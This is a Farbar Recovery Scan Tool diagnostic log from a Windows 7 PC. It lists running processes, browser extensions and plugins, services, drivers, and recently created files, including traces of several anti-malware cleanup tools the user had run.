Loaded Profiles: Martin (Available Profiles: Martin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
() C:\Windows\SysWOW64\PnkBstrB.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.7\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\..\Interfaces\{458E592A-DE20-42E8-8C67-65C88F2A797D}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=131643942694512768&GUID=72AA9CAC-BF0C-4EEC-B561-2B576365F905
HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://se.msn.com/?ocid=iehp
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2017-12-12] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll [2014-02-01] (Sun Microsystems, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2014-01-22] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2017-02-23] (Microsoft Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2017-08-15] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 9am9eglk.default
FF ProfilePath: C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default [2018-03-19]
FF Homepage: Mozilla\Firefox\Profiles\9am9eglk.default -> hxxps://www.malwarebytes.org/restorebrowser/
FF Extension: (Auto Refresh) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\autorefresh@plugin.xpi [2016-04-28] [Legacy]
FF Extension: (bug643770(Stop Autoscroll by mouse wheel)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\bug643770@alice0775.xpi [2016-04-28] [Legacy]
FF Extension: (Extra Padding When Maximized) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\extrapadding@digitaldj.net.xpi [2016-04-28] [Legacy]
FF Extension: (Paste and Go Hotkey (Keyboard Shortcut)) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\FxExtPasteNGoHtk@github.lostdj.xpi [2016-04-27] [Legacy]
FF Extension: (Gif Delayer) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-mqCpKcAruymyAA@jetpack.xpi [2016-04-27] [Legacy]
FF Extension: (YouTube ALL HTML5) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2017-08-29] [Legacy]
FF Extension: ("Manage search engines" button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\jid1-XGhxOf1M8UPpsQ@jetpack.xpi [2017-09-12] [Legacy]
FF Extension: (No Close Buttons) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\no-close-buttons@xavamedia.nl.xpi [2016-11-02] [Legacy]
FF Extension: (Secure Login) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\secureLogin@blueimp.net.xpi [2017-02-25] [Legacy]
FF Extension: (Super Start) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\superstart@enjoyfreeware.org [2015-12-05] [Legacy]
FF Extension: (Tab Deque) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabdeque@sblask.xpi [2017-11-26]
FF Extension: (Tab Kit - Mouse Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\tabkit.mouse-gestures@pikachuexe.amateur.hk.xpi [2017-03-05] [Legacy]
FF Extension: (uBlock Origin) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\uBlock0@raymondhill.net.xpi [2018-01-15]
FF Extension: (Undo Closed Tabs Button) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\undoclosedtabsbutton@supernova00.biz.xpi [2016-08-26] [Legacy]
FF Extension: (Zotero Connector) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zotero@chnm.gmu.edu.xpi [2017-12-14]
FF Extension: (Zotero Word for Windows Integration) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\zoteroWinWordIntegration@zotero.org [2016-10-15] [Legacy]
FF Extension: (uBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{2b10c1c8-a11f-4bad-fe9c-1c11e82cac42}.xpi [2015-12-05] [Legacy]
FF Extension: (FT DeepDark) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{77d2ed30-4cd2-11e0-b8af-0800200c9a66} [2017-10-17] [Legacy]
FF Extension: (All-in-One Gestures) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{8b86149f-01fb-4842-9dd8-4d7eb02fd055} [2016-04-27] [Legacy]
FF Extension: (Single Key Tab Switch) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a66191d8-898b-4a66-89be-d5b279477a54}.xpi [2015-12-31] [Legacy]
FF Extension: (LeechBlock) - C:\Users\Martin\AppData\Roaming\Mozilla\Firefox\Profiles\9am9eglk.default\Extensions\{a95d8332-e4b4-6e7f-98ac-20b733364387} [2017-11-15] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_28_0_0_161.dll [2018-02-06] ()
FF Plugin: @java.com/DTPlugin,version=1.6.0_45 -> C:\Windows\system32\npdeployJava1.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll [2014-02-01] (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_28_0_0_161.dll [2018-02-06] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-01-06] (Google, Inc.)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> D:\Spel\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2014-05-07] (Reto-Moto ApS)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
FF Plugin-x32: @mozilla.zeniko.ch/SumatraPDF_Browser_Plugin -> C:\Program Files (x86)\SumatraPDF\npPdfViewer.dll [2013-10-02] (Simon Bünzli)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-02-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-13] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1755371218-3412237994-1746218496-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Martin\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-27] (Unity Technologies ApS)
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\secure_cert.js [2018-03-01]

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default [2018-03-19]
CHR Extension: (Slides) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-19]
CHR Extension: (Docs) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-19]
CHR Extension: (Google Drive) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-12-12]
CHR Extension: (YouTube) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Google Search) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-12]
CHR Extension: (Sheets) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-19]
CHR Extension: (Heroes & Generals) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbophcdhblbipoaacgchllkobdaolpge [2014-05-11]
CHR Extension: (Google Docs Offline) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-20]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-23]
CHR Extension: (Gmail) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-15]
CHR Extension: (Chrome Media Router) - C:\Users\Martin\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-01-23]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ATTENTION: => Could not perform signature verification. Cryptographic Service is not running.

S4 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [7013384 2018-02-08] ()
S4 DisplayFusionService; C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe [1375600 2013-11-27] (Binary Fortress Software)
S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [399120 2017-02-13] (EasyAntiCheat Ltd)
S4 HiPatchService; D:\Spel\Tribes Ascend\HiPatchService.exe [9728 2017-07-12] (Hi-Rez Studios)
S4 HnGSteamService; D:\Spel\Steam Library\steamapps\common\Heroes & Generals\hngservice.exe [777000 2018-02-27] (Reto-Moto ApS)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6234056 2017-11-01] (Malwarebytes)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [519992 2018-01-10] (NVIDIA Corporation)
S4 Origin Client Service; D:\Spel\Origin\OriginClientService.exe [2122248 2016-06-25] (Electronic Arts)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [66872 2013-11-11] ()
R2 PnkBstrB; C:\Windows\SysWOW64\PnkBstrB.exe [107832 2013-11-11] ()
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
S4 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1776864 2017-05-23] (Safer-Networking Ltd.)
S4 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2131760 2017-05-23] (Safer-Networking Ltd.)
S4 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [233936 2017-05-23] (Safer-Networking Ltd.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5419792 2014-11-28] (TeamViewer GmbH)
S4 TunngleService; C:\Program Files (x86)\Tunngle\TnglCtrl.exe [814064 2015-12-22] (Tunngle.net GmbH)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.223\WsAppService.exe [473312 2017-03-20] (Wondershare)
S4 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
S4 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2013-10-18] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-16] (SlySoft, Inc.)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-05-08] ()
S3 I1KBFLTR; C:\Windows\System32\drivers\I1KBFLTR.sys [29440 2014-06-26] ()
S3 massfilter_hs; C:\Windows\system32\drivers\massfilter_hs.sys [20232 2012-06-08] (HandSet Incorporated)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253880 2018-03-02] (Malwarebytes)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [31024 2018-01-10] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [59240 2017-12-15] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-11-16] (NVIDIA Corporation)
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [62072 2015-06-16] (Oculus VR, LLC)
R3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzp1endpt; C:\Windows\System32\DRIVERS\rzp1endpt.sys [50904 2015-08-13] (Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.)
R3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 rzvmouse; C:\Windows\System32\DRIVERS\rzvmouse.sys [42712 2015-08-13] (Razer Inc)
S3 SaiK075C; C:\Windows\System32\DRIVERS\SaiK075C.sys [179872 2014-08-05] (Saitek)
R3 SaiMini; C:\Windows\System32\DRIVERS\SaiMini.sys [25120 2013-04-30] (Saitek)
R3 SaiNtBus; C:\Windows\System32\drivers\SaiBus.sys [52640 2013-04-30] (Saitek)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [381440 2013-10-18] (Duplex Secure Ltd.)
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [46408 2017-06-02] (SteelSeries ApS)
R3 tap0901t; C:\Windows\System32\DRIVERS\tap0901t.sys [47736 2015-12-21] (Tunngle.net)
S3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [34016 2014-05-27] (Microsoft Corporation)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [131080 2012-06-08] (ZTE Incorporated)
U3 ai6nfeur; C:\Windows\System32\Drivers\ai6nfeur.sys [0 ] (Advanced Micro Devices) <==== ATTENTION (zero byte File/Folder)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-19 19:58 - 2018-03-19 20:33 - 000000000 ____D C:\ProgramData\RogueKiller
2018-03-19 19:58 - 2018-03-19 19:58 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
2018-03-19 19:57 - 2018-03-19 19:57 - 000000867 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2018-03-19 19:57 - 2018-03-19 19:57 - 000000000 ____D C:\Program Files\RogueKiller
2018-03-18 09:03 - 2018-03-20 17:02 - 000000000 ____D C:\FRST
2018-03-02 11:07 - 2018-03-02 11:11 - 000000000 ____D C:\AdwCleaner
2018-03-02 10:21 - 2018-03-20 17:01 - 000000258 __RSH C:\ProgramData\ntuser.pol
2018-03-02 09:25 - 2018-03-02 09:25 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\642A2717.sys
2018-03-02 09:16 - 2018-03-19 16:55 - 000192952 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2018-03-02 09:16 - 2018-03-02 09:44 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2018-03-02 09:16 - 2018-03-02 09:16 - 000255928 _____ (Malwarebytes) C:\Windows\system32\Drivers\5143D20B.sys
2018-03-02 09:16 - 2018-03-02 09:16 - 000000000 ____D C:\Program Files (x86)\mbar
2018-03-02 08:24 - 2018-03-02 08:24 - 000001404 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000001392 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2018-03-02 08:24 - 2018-03-02 08:24 - 000000656 _____ C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000628 _____ C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000458 _____ C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job
2018-03-02 08:24 - 2018-03-02 08:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2017-05-23 09:22 - 000032240 _____ (Safer-Networking Ltd.) C:\Windows\system32\sdnclean64.exe
2018-03-02 08:21 - 2018-03-02 08:21 - 000000085 _____ C:\Windows\wininit.ini
2018-03-02 08:11 - 2018-03-20 17:01 - 000000258 __RSH C:\Users\Martin\ntuser.pol
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}
2018-03-02 07:57 - 2018-03-02 07:57 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-03-01 17:27 - 2018-03-01 17:27 - 000000000 ____D C:\Program Files\Malwarebytes
2018-03-01 17:27 - 2017-11-29 09:11 - 000077432 _____ C:\Windows\system32\Drivers\mbae64.sys
2018-03-01 17:14 - 2018-03-20 17:00 - 001661758 _____ C:\Windows\ntbtlog.txt
2018-03-01 17:10 - 2018-03-01 17:10 - 000001032 _____ C:\Users\Public\Desktop\Lightning.lnk
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightning
2018-03-01 17:10 - 2018-03-01 17:10 - 000000000 ____D C:\Program Files (x86)\Lightning
2018-03-01 17:09 - 2018-03-02 09:14 - 000000000 ____D C:\Disk
2018-03-01 17:09 - 2018-03-02 08:00 - 000000000 ____D C:\Windat
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lookup Pro
2018-03-01 17:09 - 2018-03-01 17:09 - 000000000 ____D C:\Program Files\LaCie Private Public
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\UpdatusUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-03-01 17:08 - 2018-03-01 17:29 - 000000824 _____ C:\Users\Martin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Windows\system32\Drivers\NVIDIA Corporation
2018-02-26 15:18 - 2018-02-26 15:18 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2018-02-26 15:18 - 2018-02-23 20:28 - 000136536 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2018-02-26 15:18 - 2017-12-08 23:25 - 000798520 _____ C:\Windows\SysWOW64\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:25 - 000490808 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2018-02-26 15:18 - 2017-12-08 23:24 - 000928568 _____ C:\Windows\system32\vulkan-1.dll
2018-02-26 15:18 - 2017-12-08 23:24 - 000591672 _____ C:\Windows\system32\vulkaninfo.exe
2018-02-26 15:17 - 2018-02-25 06:41 - 035619872 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 028201048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 017353248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2018-02-26 15:17 - 2018-02-25 06:40 - 000996768 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000625512 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:40 - 000514544 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2018-02-26 15:17 - 2018-02-25 06:39 - 000948128 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 040277488 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003913016 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 003443800 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001985384 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001684000 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6439101.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001137512 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2018-02-26 15:17 - 2018-02-25 06:38 - 001064760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2018-02-26 15:17 - 2018-02-25 06:37 - 035188640 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 019854312 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 013571008 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 011131696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2018-02-26 15:17 - 2018-02-25 06:36 - 000419488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 016496080 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 001153752 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000902280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000541672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000460024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000182600 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2018-02-26 15:17 - 2018-02-25 06:35 - 000164952 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
